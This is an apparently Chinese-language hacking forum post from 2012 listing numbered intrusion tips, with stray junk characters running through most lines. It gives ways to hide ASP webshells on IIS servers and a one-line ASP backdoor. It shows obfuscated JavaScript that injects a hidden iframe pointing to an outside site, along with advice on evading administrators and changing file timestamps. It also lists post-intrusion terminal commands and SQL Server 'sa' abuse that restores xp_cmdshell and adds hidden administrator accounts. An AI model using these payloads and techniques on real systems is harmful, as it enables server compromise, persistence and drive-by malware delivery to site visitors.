2 n: i( V$ a c1 M2 Z; C$ n- l/ m53、隐藏ASP后门的两种方法1 ^' U+ t" V/ }4 z8 l8 Q
1、建立非标准目录:mkdir images..\" g! z7 o5 C# u& F
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp0 ]( ]' l2 O& Q( s" R; [+ J: G8 ~
通过web访问ASP木马:http://ip/images../news.asp?action=login% U& W. H3 h) G; k5 w# H4 g" m( R
如何删除非标准目录:rmdir images..\ /s
9 G5 \) Z( S9 S8 T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:5 D9 @% Q( s" w4 g9 ?/ A; `, f- X
mkdir programme.asp# M S) ~( E7 z
新建1.txt文件内容:<!--#include file=”12.jpg”-->
7 s- Q4 X7 f7 W3 e8 w新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- c" i7 o+ b$ E x: X) B! Eattrib +H +S programme.asp# [4 A8 z0 P. R) ~
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt/ g) C9 C% ?' n% R L
* l, b" ^7 I/ j( m0 L" m
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。3 _$ W; X3 o. K9 w5 }1 N+ J
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 j+ i0 u& E* ^: X$ f& p. `. S3 L/ c; Z0 P
55、JS隐蔽挂马, A V$ [6 j( E3 N
1.
# e3 j/ a+ X; gvar tr4c3="<iframe src=ht";
2 m J, V0 y' g+ C- s. Jtr4c3 = tr4c3+"tp:/";
2 H' U! C: G( r/ q6 ]tr4c3 = tr4c3+"/ww";: ]% u5 Y3 o2 G! H9 |9 p e
tr4c3 = tr4c3+"w.tr4";* W& m* K& |# g' r$ A8 \
tr4c3 = tr4c3+"c3.com/inc/m";
, o0 o3 a4 ~" D+ [, ]4 L3 rtr4c3 = tr4c3+"m.htm style="display:none"></i";
' R1 \ t5 x' z! {tr4c3 =tr4c3+"frame>'";
1 h5 y# ~6 E Tdocument.write(tr4c3);
, m) \8 w' P q) W避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
; R2 r2 i+ h0 H1 I! `* D$ S
^) e F* E# U2 P2.) |' r% N) |) a! U( c' E6 r
转换进制,然后用EVAL执行。如
' V1 n( A7 H; i# W3 zeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 [' ~) S5 S! K
不过这个有点显眼。
u- O) S4 t6 q% S; d! x3.. \/ ?/ e# a9 s- p- v7 H
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');, b' M* g/ N' a) L" ~+ Q6 q8 s; ?
最后一点,别忘了把文件的时间也修改下。 g) A+ a/ }8 n( V! \8 X
, d- m/ N; ]5 d: E2 Z! @$ R1 l
56.3389终端入侵常用DOS命令
: z- s. l( n- ^ u; r, K( rtaskkill taskkill /PID 1248 /t
& ?* ]- j. ]9 U0 U, g3 I. B
0 L3 H- V. y4 K) K2 L$ c6 Mtasklist 查进程
( C4 G ?* _3 q, K" y" b
0 Q* N9 L& d+ y+ [' q* ?8 [5 ^cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限0 Z% @0 W+ Y+ ]" {- S; t5 R
iisreset /reboot- U3 |/ t. s$ @/ o. y
tsshutdn /reboot /delay:1 重起服务器 [5 h6 i" |+ e" `6 P7 j
' k8 s3 X! X- `. k/ tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,/ S0 l- r) @' w! c9 Q- P" D* X
! \& x' ?: \. t( Aquery user 查看当前终端用户在线情况+ p! v& {4 `! G& ^! ?/ H
/ ?6 B' T* Q! [9 Q( [; ?要显示有关所有会话使用的进程的信息,请键入:query process ** u/ W1 o4 K, {, }6 Q7 M5 K
% r) o0 S# n4 e
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, G$ L4 N& v" W6 _5 c3 h% c# X) y# c# ]& {% o7 a9 p
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& ?- ^* k- ~$ W- |& a6 m. ^: c1 L4 P0 U. t5 K/ Z
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM027 Y8 X$ w5 x$ x6 g$ L
; ]" a" z4 K: H) q
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启) S) Q$ J4 B6 K3 N3 |% j
4 e& n S, w: W# P4 r5 |- O7 y命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统( H' e% U$ u6 ~% d% X& j7 {# u
I1 t; J. X! l+ H, F; U! Q: ]2 l! p# o命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
+ n- j' m2 s/ j/ Z, M5 n$ E2 i7 N0 v- L4 z7 Y
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机' c$ g( u, e$ O
/ t% x2 h! a- u" Q( `4 O
56、在地址栏或按Ctrl+O,输入:, Z$ n1 T& X1 R+ T4 y0 b
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;- }# q; y* s* e; ~" L! ?
2 |1 c; E/ F% F$ E. [/ X/ h
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。1 H9 b" c/ v. h; k! g, M/ a. {) e
7 w' e/ e: I9 R6 m7 s" z57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' t9 k$ R2 O" c. Y2 H9 s用net localgroup administrators是可以看到管理组下,加了$的用户的。
+ E4 Z: U+ m0 z
5 H* L0 P: K4 K, \5 u1 E/ _58、 sa弱口令相关命令
6 b( k9 B3 A' O: I0 o. I% S9 }' D" K# ]+ `& g
一.更改sa口令方法:4 `& D, U5 e$ |( ^1 J8 m
用sql综合利用工具连接后,执行命令:
; _ F3 ^1 b2 m, [2 B! p% b% cexec sp_password NULL,'20001001','sa'. [" t5 T: k2 r( R, p
(提示:慎用!)9 X7 J, {4 t2 h. T
7 K8 K: A; L9 N9 o
二.简单修补sa弱口令.
K6 A3 h; l) x, @! M
/ p! U, S( D) \0 F3 `方法1:查询分离器连接后执行:
) x* {5 a4 R( O q' ?if exists (select * from' I' ?& G: ~( o" \; {* t3 I
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and; V9 {! { ?6 k3 ^0 x- u
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
; K0 A3 K! w9 a/ {; ~6 v# F8 U( ^
J; s: ~1 P/ k4 N! F0 A: s. Lexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- L; R" u# x$ l
2 o2 s0 i; [9 ~9 |8 x3 \
GO3 i& t( w9 L2 I7 h! V3 ^, D. C0 a
% e+ \5 l1 f+ O. E8 G- Q$ r# S( p
然后按F5键命令执行完毕
, M7 `4 z5 u7 n0 V8 w' [
/ E0 U; @+ i" `' M方法2:查询分离器连接后
% \2 W& z Z& g第一步执行:use master
2 D: }7 C, l/ _8 k7 B5 W' ~第二步执行:sp_dropextendedproc 'xp_cmdshell'( {4 ]6 p1 a O, O, b0 {: x' T
然后按F5键命令执行完毕
( ?6 f' z0 K! Q& s5 N2 u1 v' P2 r+ s
/ y4 \; x5 k$ Z7 K三.常见情况恢复执行xp_cmdshell.
% R" c5 @/ l3 h+ a8 ~! I. Z) u% y1 I: u0 C: j9 R9 E8 z: ^
$ }3 z6 L' X6 A1 未能找到存储过程'master..xpcmdshell'.
; ?4 r+ c8 a! ~6 } 恢复方法:查询分离器连接后,, e( m! g, U. B$ [0 F
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; e- }1 p) }) c% ]# C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ H% H$ _* `9 `6 w然后按F5键命令执行完毕3 P- u, d3 @- w/ r! q; Q% t
9 E8 D+ ^: x2 l% D& x5 \" x2 s2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ [( v, f: Y/ W& h! Y: g2 a恢复方法:查询分离器连接后,2 y& G( [. o$ b" T; P9 |4 z
第一步执行:sp_dropextendedproc "xp_cmdshell"% b3 }# G3 d; `# M f# \' @! l& e0 E
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& y3 v: D% D, B# A+ v然后按F5键命令执行完毕9 x5 i4 E/ s5 [6 |4 s% D
' E6 o5 l4 K% B' N3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
h0 e% j! C. ]; f( B1 f1 ]恢复方法:查询分离器连接后,* y8 U" p( \3 j+ A
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
4 k" }1 m6 X9 | C- J/ N4 Z/ K第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# \/ o5 s) l( f5 l: ]9 c然后按F5键命令执行完毕
$ W" `/ k9 @/ f$ u
; |! Z g/ _5 s+ B& b四.终极方法.
( ?: q3 x! [; n6 U如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
: J M; ~) @- I% d6 ~5 e4 M* m查询分离器连接后,5 g+ h; g: r) D7 d% f2 |1 V" k8 \
2000servser系统:
2 S, f& i3 v1 o8 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'4 C- i! S2 W' Z7 m, k
+ C& A. O+ V O+ c# G3 x5 B7 K) d: kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 y, Z4 v. Q9 g1 u* \5 U) t, y2 R; o5 Z7 S/ x# v3 Y$ E8 j
xp或2003server系统:2 ~, X. h" K& a* h* q/ L
& O; D1 H( f5 E" }8 v, J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
3 m; N* n/ M& ^! ~) Z/ ^5 k' T& U j, h3 j1 R3 s! F. i. m! s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 G8 P. B( {- z( H( b& c# k
|
发表于 2012-9-15 14:13:15
收藏
支持
反对